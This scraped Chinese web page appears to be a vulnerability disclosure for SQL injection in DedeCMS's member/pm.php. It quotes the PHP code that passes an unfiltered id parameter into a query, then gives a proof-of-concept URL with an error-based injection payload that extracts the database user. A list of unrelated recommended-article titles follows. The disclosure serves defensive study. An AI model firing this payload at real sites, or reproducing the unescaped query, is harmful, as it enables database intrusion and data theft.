漏洞作者: Matt

[php]member/pm.php

else if($dopost=='read')

{

$sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";

$friends = array();

$dsql->SetQuery($sql);

$dsql->Execute();

while ($row = $dsql->GetArray()) {

$friends[] = $row;

}

$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤

if(!is_array($row))

{

ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');

exit();

}

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");

include_once(dirname(__FILE__).'/templets/pm-read.htm');

exit();

}

[/php]

漏洞证明:

测试方法http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

member pm.php,Dedecms 会员中心注入漏洞5相关推荐

  1. php制作会员签到打开,【PHP】织梦dedecms会员中心模板带会员签到赚金币功能

    一:将member文件夹上传覆盖网站根目录 二:后台添加统一页头页尾调用模板(具体操作请见截图) 三:在系统-SQL命令行工具中运行一下SQL创建数据库: (此为utf-8) CREATE TABLE ...

  2. dedeCMS 会员中心注册登陆页面 - 模板修改

    dedeCMS 会员中心:注册登陆页面(logo.版权信息等)的修改问题 一. 模板文件路径及修改业务: 文件名 member\templets\ 涉及页面 修改业务 涉及图片名称 reg-new.h ...

  3. 织梦php版本图片不能上传,织梦Dedecms会员中心无法上传图片的解决方法

    织梦Dedecms会员中心,由于为了安全性问题,限制了注册会员在会员中心发布信息的时候上传图片,但是管理员登录会员中心发布信息的时候上传图片却不受影响.那该如何解决呢?下面我们来说明一下具体的解决方案 ...

  4. 织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞

    微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. Hackme论坛原创 转载请附带原文链接 作者: c4rp3nt3r ...

  5. 小刀娱乐网:dedecms 会员中心调用会员最后登录时间 和上次登录ip

    在会员中心的任意模板中可以调用以下自定义函数 <?php echo login_time_ip($cfg_ml->M_ID);?> 将以下函数放到include/extend.fun ...

  6. 织梦dedecms会员中心投稿,管理员审核后,文档稿件动态浏览,禁止生成静态页

    后台模型管理中,会员稿件默认状态,官方默认只有三个选项.如果选择投稿后未审核,那么.后台审核后,文档会自动生成静态页.没法动态浏览.解决办法是增加一个选项.如图 需要修改三个文件 一是,后台模板目录中 ...

  7. member.php?mod=register文件在哪里,DEDECMS修改member会员中心文件夹名称 更改member目录名称...

    DEDECMS做站过程中有时候不可避免被各种营销软件强行发布广告,因此为了避免这个情况,我们要嘛是加强注册审核,要嘛就是参考我们这篇文章,将会员中心文件夹完全改名,避免被特征扫描到. 下面是操作方法: ...

  8. album add.php 修复,dedecms SQL注入漏洞 member/album_add.php 修复

    dedecms的/dedecms/member/album_add.php文件中,对输入参数mtypesid未进行int整型转义,导致SQL注入的发生. 打开文件:/member/album_add. ...

  9. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

最新文章

  1. 计算机视觉经典任务分类
  2. Newtonsoft.Json使用
  3. java 错误声音播放器_java 音频播放器出不了声音,代码里哪有问题啊?
  4. HTML5数据库建模,HTML5的五种客户端离线存储方案
  5. wordpress使用retro方案出现413 Request Entity Too Large(Activate还是有问题)
  6. SQLite编译问题
  7. 利用“多说”制作留言板、评论系统
  8. 计算机导论布尔运算,计算机导论第2讲-符号化-计算化-自动化.pdf
  9. 满纸辛酸泪 —— 红楼梦中话
  10. 172.阶乘后的零 (力扣leetcode) 博主可答疑该问题
  11. 《中國姓氏大全》【带拼音】
  12. 乐优商城遇到的坑(二):Day56 品牌管理之虚拟机CentOS6.5我真的不会装
  13. python 制作抽奖箱_海安当地横幅制作值得推荐,抽奖箱制作-漫谈
  14. 《天涯明月刀》服务器端3D引擎设计与开发
  15. php的rps,如何理解RPS的本质
  16. linux huge模式设置,Linux 下 Hugepages的配置
  17. 如何在Java中写模糊查询
  18. 为啥VUE和React都选择hooks
  19. python圣诞雪人
  20. 【笔记】编程的原则:改善代码质量的101个方法

热门文章

  1. Java千百问_07JVM架构(001)_java内存模型是什么样的
  2. SPOJ Problem 22:Triangle From Centroid
  3. 利用Linq2Sql+Juqery实现通用查询功能
  4. C# Reflection
  5. 《陪孩子像搭积木一样学编程》,一起来玩Scratch(1)使用Scratch编程的基本流程...
  6. call、apply、bind的区别,模拟call、apply和bind的实现
  7. Linux centosVMware shell编程 for循环、while循环、break跳出循环、continue结束本次循环、exit退出整个脚本...
  8. ES6 的遍历器接口 Iterator
  9. 本人复习总结全部资料及其简历供大家參考
  10. 微信公众平台开发之留言板